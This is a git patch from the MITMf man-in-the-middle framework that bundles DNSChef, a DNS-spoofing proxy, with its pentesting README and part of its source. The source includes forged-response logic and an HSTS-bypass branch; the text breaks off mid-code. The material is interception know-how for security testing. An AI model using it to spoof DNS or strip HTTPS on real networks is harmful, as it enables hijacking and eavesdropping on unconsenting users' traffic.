From 663f38e732ee1681b226d48fddec922cb6b3d1c3 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Sun, 19 Apr 2015 23:32:52 +0200 Subject: [PATCH 01/20] initial dynamic config support added configwatcher.py --- .gitmodules | 3 - README.md | 12 +- config/mitmf.conf | 2 +- core/configwatcher.py | 49 +++ core/dnschef/CHANGELOG | 29 ++ core/dnschef/LICENSE | 25 ++ core/dnschef/README.md | 339 +++++++++++++++ core/dnschef/__init__.py | 0 core/dnschef/dnschef.py | 502 +++++++++++++++++++++++ core/sslstrip/ClientRequest.py | 20 +- core/sslstrip/SSLServerConnection.py | 12 +- core/sslstrip/ServerConnection.py | 10 +- core/sslstrip/ServerConnectionFactory.py | 4 +- core/sslstrip/URLMonitor.py | 75 ++-- core/utils.py | 106 +++-- libs/dnschef | 1 - mitmf.py | 66 +-- plugins/AppCachePoison.py | 9 +- plugins/BeefAutorun.py | 106 +++-- plugins/BrowserProfiler.py | 2 +- plugins/FilePwn.py | 78 ++-- plugins/Inject.py | 9 +- plugins/SSLstrip+.py | 2 +- plugins/Spoof.py | 2 +- plugins/plugin.py | 4 - requirements.txt | 1 + 26 files changed, 1187 insertions(+), 281 deletions(-) create mode 100644 core/configwatcher.py create mode 100644 core/dnschef/CHANGELOG create mode 100644 core/dnschef/LICENSE create mode 100644 core/dnschef/README.md create mode 100644 core/dnschef/__init__.py create mode 100755 core/dnschef/dnschef.py delete mode 160000 libs/dnschef diff --git a/.gitmodules b/.gitmodules index ca49b01..fbdd874 100644 --- a/.gitmodules +++ b/.gitmodules @@ -7,6 +7,3 @@ [submodule "core/beefapi"] path = core/beefapi url = https://github.com/byt3bl33d3r/beefapi -[submodule "libs/dnschef"] - path = libs/dnschef - url = https://github.com/byt3bl33d3r/dnschef diff --git a/README.md b/README.md index 109f42d..3334510 100644 --- a/README.md +++ b/README.md @@ -13,6 +13,13 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox ============================ As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required. +How to install on Kali +====================== + +```apt-get install mitmf``` + +**Currently Kali has a very old version of MITMf in it's repos, please read the [Installation](#installation) section to get the latest version** + Installation ============ If MITMf is not in your distros repo or you just want the latest version: @@ -79,8 +86,3 @@ If you find a *bug* please open an issue and include at least the following in t - OS your using Also remember: Github markdown is your friend! - -How to install on Kali -====================== - -```apt-get install mitmf``` diff --git a/config/mitmf.conf b/config/mitmf.conf index f1f5b32..58d82e5 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -40,7 +40,7 @@ nameservers = 8.8.8.8 [[[A]]] # Queries for IPv4 address records - *.thesprawl.org=192.0.2.1 + *.thesprawls.org=192.0.2.1 [[[AAAA]]] # Queries for IPv6 address records *.thesprawl.org=2001:db8::1 diff --git a/core/configwatcher.py b/core/configwatcher.py new file mode 100644 index 0000000..0a2e570 --- /dev/null +++ b/core/configwatcher.py @@ -0,0 +1,49 @@ +#! /usr/bin/env python2.7 + +import logging + +logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages +from watchdog.observers import Observer +from watchdog.events import FileSystemEventHandler + +from configobj import ConfigObj + +mitmf_logger = logging.getLogger('mitmf') + +class ConfigWatcher(FileSystemEventHandler): + + _instance = None + + def __init__(self): + + self.config = ConfigObj("./config/mitmf.conf") + + @staticmethod + def getInstance(): + if ConfigWatcher._instance is None: + ConfigWatcher._instance = ConfigWatcher() + + return ConfigWatcher._instance + + def startConfigWatch(self): + observer = Observer() + observer.schedule(self, path='./config', recursive=False) + observer.start() + + def getConfig(self): + return self.config + + def on_modified(self, event): + mitmf_logger.debug("[{}] Detected configuration changes, reloading!".format(self.__class__.__name__)) + self.reloadConfig() + self.onConfigChange() + + def onConfigChange(self): + """ We can subclass this function to do stuff after the config file has been modified""" + pass + + def reloadConfig(self): + try: + self.config = ConfigObj("./config/mitmf.conf") + except Exception, e: + mitmf_logger.warning("Error reloading config file: {}".format(e)) diff --git a/core/dnschef/CHANGELOG b/core/dnschef/CHANGELOG new file mode 100644 index 0000000..727a7d7 --- /dev/null +++ b/core/dnschef/CHANGELOG @@ -0,0 +1,29 @@ +Version 0.3 + +* Added support for the latest version of the dnslib library - 0.9.3 +* Added support for logging. (idea by kafeine) +* Added support for SRV, DNSKEY, and RRSIG records. (idea by mubix) +* Added support for TCP remote nameserver connections. (idea by mubix) +* DNS name matching is now case insensitive. +* Various small bug fixes and performance tweaks. +* Python libraries are no longer bundled with the distribution, but + compiled in the Windows binary. + +Version 0.2.1 + +* Fixed a Python 2.6 compatibility issue. (thanks Mehran Goudarzi) + +Version 0.2 + +* Added IPv6 support. +* Added AAAA, MX, CNAME, NS, SOA and NAPTR support. +* Added support for ANY queries (returns all known fake records). +* Changed file format to support more DNS record types. +* Added alternative DNS port support (contributed by fnv). +* Added alternative listening port support for the server (contributed by Mark Straver). +* Updated bundled dnslib library to the latest version - 0.8.2. +* Included IPy library for IPv6 support. + +Version 0.1 + +* First public release diff --git a/core/dnschef/LICENSE b/core/dnschef/LICENSE new file mode 100644 index 0000000..b826757 --- /dev/null +++ b/core/dnschef/LICENSE @@ -0,0 +1,25 @@ +Copyright (C) 2014 Peter Kacherginsky +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +3. Neither the name of the copyright holder nor the names of its contributors + may be used to endorse or promote products derived from this software without + specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR +ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/core/dnschef/README.md b/core/dnschef/README.md new file mode 100644 index 0000000..589a274 --- /dev/null +++ b/core/dnschef/README.md @@ -0,0 +1,339 @@ +DNSChef +======= + +The latest version of this document can be obtained from http://thesprawl.org/projects/dnschef/ + +DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet. + +There are several DNS Proxies out there. Most will simply point all DNS queries a single IP address or implement only rudimentary filtering. DNSChef was developed as part of a penetration test where there was a need for a more configurable system. As a result, DNSChef is cross-platform application capable of forging responses based on inclusive and exclusive domain lists, supporting multiple DNS record types, matching domains with wildcards, proxying true responses for nonmatching domains, defining external configuration files, IPv6 and many other features. You can find detailed explanation of each of the features and suggested uses below. + +The use of DNS Proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP Proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination. + +Setting up a DNS Proxy +====================== + +Before you can start using DNSChef, you must configure your machine to use a DNS nameserver with the tool running on it. You have several options based on the operating system you are going to use: + +* **Linux** - Edit */etc/resolv.conf* to include a line on the very top with your traffic analysis host (e.g add "nameserver 127.0.0.1" if you are running locally). Alternatively, you can add a DNS server address using tools such as Network Manager. Inside the Network Manager open IPv4 Settings, select *Automatic (DHCP) addresses only* or *Manual* from the *Method* drop down box and edit *DNS Servers* text box to include an IP address with DNSChef running. + +* **Windows** - Select *Network Connections* from the *Control Panel*. Next select one of the connections (e.g. "Local Area Connection"), right-click on it and select properties. From within a newly appearing dialog box, select *Internet Protocol (TCP/IP)* and click on properties. At last select *Use the following DNS server addresses* radio button and enter the IP address with DNSChef running. For example, if running locally enter 127.0.0.1. + +* **OS X** - Open *System Preferences* and click on the *Network* icon. Select the active interface and fill in the *DNS Server* field. If you are using Airport then you will have to click on *Advanced...* button and edit DNS servers from there. Alternatively, you can edit */etc/resolv.conf* and add a fake nameserver to the very top there (e.g "nameserver 127.0.0.1"). + +* **iOS** - Open *Settings* and select *General*. Next select on *Wi-Fi* and click on a blue arrow to the right of an active Access Point from the list. Edit DNS entry to point to the host with DNSChef running. Make sure you have disabled Cellular interface (if available). + +* **Android** - Open *Settings* and select *Wireless and network*. Click on *Wi-Fi settings* and select *Advanced* after pressing the *Options* button on the phone. Enable *Use static IP* checkbox and configure a custom DNS server. + +If you do not have the ability to modify device's DNS settings manually, then you still have several options involving techniques such as [ARP Spoofing](http://en.wikipedia.org/wiki/ARP_spoofing), [Rogue DHCP](http://www.yersinia.net/doc.htm) and other creative methods. + +At last you need to configure a fake service where DNSChef will point all of the requests. For example, if you are trying to intercept web traffic, you must bring up either a separate web server running on port 80 or set up a web proxy (e.g. Burp) to intercept traffic. DNSChef will point queries to your proxy/server host with properly configured services. + +Running DNSChef +=============== + +DNSChef is a cross-platform application developed in Python which should run on most platforms which have a Python interpreter. You can use the supplied *dnschef.exe* executable to run it on Windows hosts without installing a Python interpreter. This guide will concentrate on Unix environments; however, all of the examples below were tested to work on Windows as well. + +Let's get a taste of DNSChef with its most basic monitoring functionality. Execute the following command as root (required to start a server on port 53): + + # ./dnschef.py + + _ _ __ + | | version 0.2 | | / _| + __| |_ __ ___ ___| |__ ___| |_ + / _` | '_ \/ __|/ __| '_ \ / _ \ _| + | (_| | | | \__ \ (__| | | | __/ | + \__,_|_| |_|___/\___|_| |_|\___|_| + iphelix@thesprawl.org + + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [*] No parameters were specified. Running in full proxy mode + + +Without any parameters, DNSChef will run in full proxy mode. This means that all requests will simply be forwarded to an upstream DNS server (8.8.8.8 by default) and returned back to the quering host. For example, let's query an "A" record for a domain and observe results: + + $ host -t A thesprawl.org + thesprawl.org has address 108.59.3.64 + +DNSChef will print the following log line showing time, source IP address, type of record requested and most importantly which name was queried: + + [23:54:03] 127.0.0.1: proxying the response of type 'A' for thesprawl.org + +This mode is useful for simple application monitoring where you need to figure out which domains it uses for its communications. + +DNSChef has full support for IPv6 which can be activated using *-6* or *--ipv6** flags. It works exactly as IPv4 mode with the exception that default listening interface is switched to ::1 and default DNS server is switched to 2001:4860:4860::8888. Here is a sample output: + + # ./dnschef.py -6 + _ _ __ + | | version 0.2 | | / _| + __| |_ __ ___ ___| |__ ___| |_ + / _` | '_ \/ __|/ __| '_ \ / _ \ _| + | (_| | | | \__ \ (__| | | | __/ | + \__,_|_| |_|___/\___|_| |_|\___|_| + iphelix@thesprawl.org + + [*] Using IPv6 mode. + [*] DNSChef started on interface: ::1 + [*] Using the following nameservers: 2001:4860:4860::8888 + [*] No parameters were specified. Running in full proxy mode + [00:35:44] ::1: proxying the response of type 'A' for thesprawl.org + [00:35:44] ::1: proxying the response of type 'AAAA' for thesprawl.org + [00:35:44] ::1: proxying the response of type 'MX' for thesprawl.org + +NOTE: By default, DNSChef creates a UDP listener. You can use TCP instead with the *--tcp* argument discussed later. + +Intercept all responses +----------------------- + +Now, that you know how to start DNSChef let's configure it to fake all replies to point to 127.0.0.1 using the *--fakeip* parameter: + + # ./dnschef.py --fakeip 127.0.0.1 -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [*] Cooking all A replies to point to 127.0.0.1 + [23:55:57] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1 + [23:55:57] 127.0.0.1: proxying the response of type 'AAAA' for google.com + [23:55:57] 127.0.0.1: proxying the response of type 'MX' for google.com + +In the above output you an see that DNSChef was configured to proxy all requests to 127.0.0.1. The first line of log at 08:11:23 shows that we have "cooked" the "A" record response to point to 127.0.0.1. However, further requests for 'AAAA' and 'MX' records are simply proxied from a real DNS server. Let's see the output from requesting program: + + $ host google.com localhost + google.com has address 127.0.0.1 + google.com has IPv6 address 2001:4860:4001:803::1001 + google.com mail is handled by 10 aspmx.l.google.com. + google.com mail is handled by 40 alt3.aspmx.l.google.com. + google.com mail is handled by 30 alt2.aspmx.l.google.com. + google.com mail is handled by 20 alt1.aspmx.l.google.com. + google.com mail is handled by 50 alt4.aspmx.l.google.com. + +As you can see the program was tricked to use 127.0.0.1 for the IPv4 address. However, the information obtained from IPv6 (AAAA) and mail (MX) records appears completely legitimate. The goal of DNSChef is to have the least impact on the correct operation of the program, so if an application relies on a specific mailserver it will correctly obtain one through this proxied request. + +Let's fake one more request to illustrate how to target multiple records at the same time: + + # ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [*] Cooking all A replies to point to 127.0.0.1 + [*] Cooking all AAAA replies to point to ::1 + [00:02:14] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1 + [00:02:14] 127.0.0.1: cooking the response of type 'AAAA' for google.com to ::1 + [00:02:14] 127.0.0.1: proxying the response of type 'MX' for google.com + +In addition to the --fakeip flag, I have now specified --fakeipv6 designed to fake 'AAAA' record queries. Here is an updated program output: + + $ host google.com localhost + google.com has address 127.0.0.1 + google.com has IPv6 address ::1 + google.com mail is handled by 10 aspmx.l.google.com. + google.com mail is handled by 40 alt3.aspmx.l.google.com. + google.com mail is handled by 30 alt2.aspmx.l.google.com. + google.com mail is handled by 20 alt1.aspmx.l.google.com. + google.com mail is handled by 50 alt4.aspmx.l.google.com. + +Once more all of the records not explicitly overriden by the application were proxied and returned from the real DNS server. However, IPv4 (A) and IPv6 (AAAA) were both faked to point to a local machine. + +DNSChef supports multiple record types: + + +--------+--------------+-----------+--------------------------+ + | Record | Description |Argument | Example | + +--------+--------------+-----------+--------------------------+ + | A | IPv4 address |--fakeip | --fakeip 192.0.2.1 | + | AAAA | IPv6 address |--fakeipv6 | --fakeipv6 2001:db8::1 | + | MX | Mail server |--fakemail | --fakemail mail.fake.com | + | CNAME | CNAME record |--fakealias| --fakealias www.fake.com | + | NS | Name server |--fakens | --fakens ns.fake.com | + +--------+--------------+-----------+--------------------------+ + +NOTE: For usability not all DNS record types are exposed on the command line. Additional records such as PTR, TXT, SOA, etc. can be specified using the --file flag and an appropriate record header. See the [external definitions file](#external-definitions-file) section below for details. + +At last let's observe how the application handles queries of type ANY: + + # ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.fake.com --fakealias www.fake.com --fakens ns.fake.com -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [*] Cooking all A replies to point to 127.0.0.1 + [*] Cooking all AAAA replies to point to ::1 + [*] Cooking all MX replies to point to mail.fake.com + [*] Cooking all CNAME replies to point to www.fake.com + [*] Cooking all NS replies to point to ns.fake.com + [00:17:29] 127.0.0.1: cooking the response of type 'ANY' for google.com with all known fake records. + +DNS ANY record queries results in DNSChef returning every faked record that it knows about for an applicable domain. Here is the output that the program will see: + + $ host -t ANY google.com localhost + google.com has address 127.0.0.1 + google.com has IPv6 address ::1 + google.com mail is handled by 10 mail.fake.com. + google.com is an alias for www.fake.com. + google.com name server ns.fake.com. + +Filtering domains +----------------- + +Using the above example, consider you only want to intercept requests for *thesprawl.org* and leave queries to all other domains such as *webfaction.com* without modification. You can use the *--fakedomains* parameter as illustrated below: + + # ./dnschef.py --fakeip 127.0.0.1 --fakedomains thesprawl.org -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [*] Cooking replies to point to 127.0.0.1 matching: thesprawl.org + [00:23:37] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 127.0.0.1 + [00:23:52] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com + +From the above example the request for *thesprawl.org* was faked; however, the request for *mx9.webfaction.com* was left alone. Filtering domains is very useful when you attempt to isolate a single application without breaking the rest. + +NOTE: DNSChef will not verify whether the domain exists or not before faking the response. If you have specified a domain it will always resolve to a fake value whether it really exists or not. + +Reverse filtering +----------------- + +In another situation you may need to fake responses for all requests except a defined list of domains. You can accomplish this task using the *--truedomains* parameter as follows: + + # ./dnschef.py --fakeip 127.0.0.1 --truedomains thesprawl.org,*.webfaction.com -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [*] Cooking replies to point to 127.0.0.1 not matching: *.webfaction.com, thesprawl.org + [00:27:57] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com + [00:28:05] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1 + +There are several things going on in the above example. First notice the use of a wildcard (*). All domains matching *.webfaction.com will be reverse matched and resolved to their true values. The request for 'google.com' returned 127.0.0.1 because it was not on the list of excluded domains. + +NOTE: Wildcards are position specific. A mask of type *.thesprawl.org will match www.thesprawl.org but not www.test.thesprawl.org. However, a mask of type *.*.thesprawl.org will match thesprawl.org, www.thesprawl.org and www.test.thesprawl.org. + +External definitions file +------------------------- + +There may be situations where defining a single fake DNS record for all matching domains may not be sufficient. You can use an external file with a collection of DOMAIN=RECORD pairs defining exactly where you want the request to go. + +For example, let create the following definitions file and call it *dnschef.ini*: + + [A] + *.google.com=192.0.2.1 + thesprawl.org=192.0.2.2 + *.wordpress.*=192.0.2.3 + +Notice the section header [A], it defines the record type to DNSChef. Now let's carefully observe the output of multiple queries: + + # ./dnschef.py --file dnschef.ini -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [+] Cooking A replies for domain *.google.com with '192.0.2.1' + [+] Cooking A replies for domain thesprawl.org with '192.0.2.2' + [+] Cooking A replies for domain *.wordpress.* with '192.0.2.3' + [00:43:54] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1 + [00:44:05] 127.0.0.1: cooking the response of type 'A' for www.google.com to 192.0.2.1 + [00:44:19] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 192.0.2.2 + [00:44:29] 127.0.0.1: proxying the response of type 'A' for www.thesprawl.org + [00:44:40] 127.0.0.1: cooking the response of type 'A' for www.wordpress.org to 192.0.2.3 + [00:44:51] 127.0.0.1: cooking the response of type 'A' for wordpress.com to 192.0.2.3 + [00:45:02] 127.0.0.1: proxying the response of type 'A' for slashdot.org + +Both *google.com* and *www.google.com* matched the *\*.google.com* entry and correctly resolved to *192.0.2.1*. On the other hand *www.thesprawl.org* request was simply proxied instead of being modified. At last all variations of *wordpress.com*, *www.wordpress.org*, etc. matched the *\*.wordpress.\** mask and correctly resolved to *192.0.2.3*. At last an undefined *slashdot.org* query was simply proxied with a real response. + +You can specify section headers for all other supported DNS record types including the ones not explicitly exposed on the command line: [A], [AAAA], [MX], [NS], [CNAME], [PTR], [NAPTR] and [SOA]. For example, let's define a new [PTR] section in the 'dnschef.ini' file: + + [PTR] + *.2.0.192.in-addr.arpa=fake.com + +Let's observe DNSChef's behavior with this new record type: + + ./dnschef.py --file dnschef.ini -q + [sudo] password for iphelix: + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [+] Cooking PTR replies for domain *.2.0.192.in-addr.arpa with 'fake.com' + [00:11:34] 127.0.0.1: cooking the response of type 'PTR' for 1.2.0.192.in-addr.arpa to fake.com + +And here is what a client might see when performing reverse DNS queries: + + $ host 192.0.2.1 localhost + 1.2.0.192.in-addr.arpa domain name pointer fake.com. + +Some records require exact formatting. Good examples are SOA and NAPTR + + [SOA] + *.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600 + + [NAPTR] + *.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! . + +See sample dnschef.ini file for additional examples. + +Advanced Filtering +------------------ + +You can mix and match input from a file and command line. For example the following command uses both *--file* and *--fakedomains* parameters: + + # ./dnschef.py --file dnschef.ini --fakeip 6.6.6.6 --fakedomains=thesprawl.org,slashdot.org -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [+] Cooking A replies for domain *.google.com with '192.0.2.1' + [+] Cooking A replies for domain thesprawl.org with '192.0.2.2' + [+] Cooking A replies for domain *.wordpress.* with '192.0.2.3' + [*] Cooking A replies to point to 6.6.6.6 matching: *.wordpress.*, *.google.com, thesprawl.org + [*] Cooking A replies to point to 6.6.6.6 matching: slashdot.org, *.wordpress.*, *.google.com, thesprawl.org + [00:49:05] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1 + [00:49:15] 127.0.0.1: cooking the response of type 'A' for slashdot.org to 6.6.6.6 + [00:49:31] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 6.6.6.6 + [00:50:08] 127.0.0.1: proxying the response of type 'A' for tor.com + +Notice the definition for *thesprawl.org* in the command line parameter took precedence over *dnschef.ini*. This could be useful if you want to override values in the configuration file. slashdot.org still resolves to the fake IP address because it was specified in the *--fakedomains* parameter. tor.com request is simply proxied since it was not specified in either command line or the configuration file. + +Other configurations +==================== + +For security reasons, DNSChef listens on a local 127.0.0.1 (or ::1 for IPv6) interface by default. You can make DNSChef listen on another interface using the *--interface* parameter: + + # ./dnschef.py --interface 0.0.0.0 -q + [*] DNSChef started on interface: 0.0.0.0 + [*] Using the following nameservers: 8.8.8.8 + [*] No parameters were specified. Running in full proxy mode + [00:50:53] 192.0.2.105: proxying the response of type 'A' for thesprawl.org + +or for IPv6: + + # ./dnschef.py -6 --interface :: -q + [*] Using IPv6 mode. + [*] DNSChef started on interface: :: + [*] Using the following nameservers: 2001:4860:4860::8888 + [*] No parameters were specified. Running in full proxy mode + [00:57:46] 2001:db8::105: proxying the response of type 'A' for thesprawl.org + +By default, DNSChef uses Google's public DNS server to make proxy requests. However, you can define a custom list of nameservers using the *--nameservers* parameter: + + # ./dnschef.py --nameservers 4.2.2.1,4.2.2.2 -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 4.2.2.1, 4.2.2.2 + [*] No parameters were specified. Running in full proxy mode + [00:55:08] 127.0.0.1: proxying the response of type 'A' for thesprawl.org + +It is possible to specify non-standard nameserver port using IP#PORT notation: + + # ./dnschef.py --nameservers 192.0.2.2#5353 -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 192.0.2.2#5353 + [*] No parameters were specified. Running in full proxy mode + [02:03:12] 127.0.0.1: proxying the response of type 'A' for thesprawl.org + +At the same time it is possible to start DNSChef itself on an alternative port using the *-p port#* parameter: + + # ./dnschef.py -p 5353 -q + [*] Listening on an alternative port 5353 + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [*] No parameters were specified. Running in full proxy mode + +DNS protocol can be used over UDP (default) or TCP. DNSChef implements a TCP mode which can be activated with the *--tcp* flag. + +Internal architecture +===================== + +Here is some information on the internals in case you need to adapt the tool for your needs. DNSChef is built on top of the SocketServer module and uses threading to help process multiple requests simultaneously. The tool is designed to listen on TCP or UDP ports (default is port 53) for incoming requests and forward those requests when necessary to a real DNS server over UDP. + +The excellent [dnslib library](https://bitbucket.org/paulc/dnslib/wiki/Home) is used to dissect and reassemble DNS packets. It is particularly useful when generating response packets based on queries. [IPy](https://github.com/haypo/python-ipy/) is used for IPv6 addresses manipulation. Both libraries come bundled with DNSChef to ease installation. + +DNSChef is capable of modifing queries for records of type "A", "AAAA", "MX", "CNAME", "NS", "TXT", "PTR", "NAPTR", "SOA", "ANY". It is very easy to expand or modify behavior for any record. Simply add another **if qtype == "RECORD TYPE")** entry and tell it what to reply with. + +Enjoy the tool and forward all requests and comments to iphelix [at] thesprawl.org. + +Happy hacking! + -Peter diff --git a/core/dnschef/__init__.py b/core/dnschef/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/dnschef/dnschef.py b/core/dnschef/dnschef.py new file mode 100755 index 0000000..971c787 --- /dev/null +++ b/core/dnschef/dnschef.py @@ -0,0 +1,502 @@ +#!/usr/bin/env python2.7 +# +# DNSChef is a highly configurable DNS Proxy for Penetration Testers +# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/ +# for the latest version and documentation. Please forward all issues and +# concerns to iphelix [at] thesprawl.org. + +# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright notice, this +# list of conditions and the following disclaimer. +# 2. Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# 3. Neither the name of the copyright holder nor the names of its contributors +# may be used to endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR +# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +import threading, random, operator, time +import SocketServer, socket, sys, os +import binascii +import string +import base64 +import time +import logging + +from configobj import ConfigObj +from core.configwatcher import ConfigWatcher + +from dnslib import * +from IPy import IP + +formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") +dnschef_logger = logging.getLogger('dnschef') +fileHandler = logging.FileHandler("./logs/dnschef/dnschef.log") +fileHandler.setFormatter(formatter) +dnschef_logger.addHandler(fileHandler) + +# DNSHandler Mixin. The class contains generic functions to parse DNS requests and +# calculate an appropriate response based on user parameters. +class DNSHandler(): + + def parse(self,data): + + nametodns = DNSChef.getInstance().nametodns + nameservers = DNSChef.getInstance().nameservers + hsts = DNSChef.getInstance().hsts + hstsconfig = DNSChef.getInstance().real_records + server_address = DNSChef.getInstance().server_address + + response = "" + + try: + # Parse data as DNS + d = DNSRecord.parse(data) + + except Exception, e: + dnschef_logger.info("{} ERROR: invalid DNS request".format(self.client_address[0])) + + else: + # Only Process DNS Queries + if QR[d.header.qr] == "QUERY": + + # Gather query parameters + # NOTE: Do not lowercase qname here, because we want to see + # any case request weirdness in the logs. + qname = str(d.q.qname) + + # Chop off the last period + if qname[-1] == '.': qname = qname[:-1] + + qtype = QTYPE[d.q.qtype] + + # Find all matching fake DNS records for the query name or get False + fake_records = dict() + + for record in nametodns: + + fake_records[record] = self.findnametodns(qname, nametodns[record]) + + if hsts: + if qname in hstsconfig: + response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d) + return response + + elif qname[:4] == 'wwww': + response = self.hstsbypass(qname[1:], qname, nameservers, d) + return response + + elif qname[:3] == 'web': + response = self.hstsbypass(qname[3:], qname, nameservers, d) + return response + + # Check if there is a fake record for the current request qtype + if qtype in fake_records and fake_records[qtype]: + + fake_record = fake_records[qtype] + + # Create a custom response to the query + response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) + + dnschef_logger.info("{} cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record)) + + # IPv6 needs additional work before inclusion: + if qtype == "AAAA": + ipv6 = IP(fake_record) + ipv6_bin = ipv6.strBin() + ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)] + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple))) + + elif qtype == "SOA": + mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ") + times = tuple([int(t) for t in [t1,t2,t3,t4,t5]]) + + # dnslib doesn't like trailing dots + if mname[-1] == ".": mname = mname[:-1] + if rname[-1] == ".": rname = rname[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times))) + + elif qtype == "NAPTR": + order,preference,flags,service,regexp,replacement = fake_record.split(" ") + order = int(order) + preference = int(preference) + + # dnslib doesn't like trailing dots + if replacement[-1] == ".": replacement = replacement[:-1] + + response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) ) + + elif qtype == "SRV": + priority, weight, port, target = fake_record.split(" ") + priority = int(priority) + weight = int(weight) + port = int(port) + if target[-1] == ".": target = target[:-1] + + response.add_answer(RR(qname, 